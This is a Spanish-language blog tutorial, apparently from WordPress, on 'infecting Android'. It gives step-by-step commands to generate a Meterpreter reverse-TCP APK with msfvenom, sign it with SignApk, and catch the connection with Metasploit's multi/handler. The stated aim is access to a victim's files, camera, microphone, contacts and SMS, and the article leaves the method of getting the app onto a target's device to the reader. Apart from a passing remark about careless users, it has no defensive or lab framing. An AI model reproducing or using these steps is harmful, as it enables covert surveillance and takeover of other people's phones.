Infectando a Android

Estándar

El sistema operativo Android es uno de los más usados  en la actualidad, por su facilidad de manejo y personalización del celular, además lo podemos encontrar de manera masificada en los teléfonos y tablets,   además de estos dispositivos se puede encontrar en relojes inteligente, autos, etc.

Con el correr de los tiempos se han encontrado diversas fallas en su mecanismo de seguridad, asimismo se  debe sumar  falta de conocimiento de los usuarios finales, los cuales no se informan  de los permisos  que están  dando a la aplicación que van a instalar, de este manera se ha podido infectar aplicaciones para tener acceso  al teléfono sí que el usuario tenga conocimiento.  También  se ha visto que se puede tener acceso a través de un mms, spam, anuncios, etc.

En el siguiente tutorial  se verá la forma de tener acceso a un móvil  con una aplicación infectada en una red local , la cual nos dará  acceso a las carpeta, cámara, grabar voz , ver los contactos del dispositivos y los sms entre otras cosas.

Herramientas a usar

  • Kali Linux 2.0
  • El paquete SignApk –> Descargar
  • Celular o Tablet para probar la aplicación

Procedimiento:

Paso 1.

Vamos a crear la aplicación para esto abrimos una terminal  y colocamos el siguiente comando.

#msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=1524 R > Nombre.apk

paso1

Paso 2.

Ahora a la aplicación se debe colocar  el certificado y  la clave privada, para esto descargamos el paquete de SignApk, lo extraemos lo cual nos va  aparecer una carpeta llamada SignApk.

paso2

Paso 3.

Debe mover la aplicación creada en el paso 1 a la carpeta  SignApk, una realizado debe ingresar el siguiente comando.

#java –jar signapk.jar certificate.pem key.pk8 nombre.apk nvo-nombre.apk

paso3paso3.1

Paso 4

Se debe abrir la consola de Metasploit para esto ingresamos el comando
#msfconsole

paso4paso4.2

paso 5

Ingrese el siguiente comando  en la consola de Metasploit
use multi/handler

paso5
Handler es lo que utilizamos para conectar con un. Dependiendo del payload, el handler quedará a la escucha esperando una conexión por parte del payload (reverse payload) o iniciará una conexión contra un host en un puerto especificado.

Paso 6

Ahora se debe indicar que PAYLOAD  se va a utilizar, configuraciones de PAYLOAD (LPORT, LHOST).  Ejecutar el exploit

paso6paso7paso8

Paso 7

Después de ejecutar el exploit, se debe infectar el dispositivo  android, lo cual pueden usar varias tecnicas, por lo cual se deja a elección de cada uno.

Una vez instalada la aplicacion en el dispositvos ya tendremos acceso a el, para ver que comandos podemos usar en la consola solo ingresamos help.

paso10

Video:

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s